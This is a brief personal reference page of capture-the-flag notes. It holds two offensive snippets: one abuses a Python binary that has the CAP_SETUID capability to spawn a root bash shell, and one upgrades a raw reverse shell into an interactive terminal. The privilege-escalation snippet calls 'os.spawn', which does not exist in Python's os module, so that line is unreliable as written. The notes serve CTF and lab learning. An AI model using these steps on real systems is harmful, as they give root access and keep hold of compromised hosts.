Assorted Notes from CTFs

Just some small reference notes for things I come across in CTFs that I don’t want to forget.

Python

CAP_SETUID

For Python binaries with SUID capabilities
Relevant article by tbhaxor

>>> import os
>>> os.setuid(0)
>>> os.spawn("/bin/bash")

Proper shell from reverse shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo; fg
enter
export TERM=xterm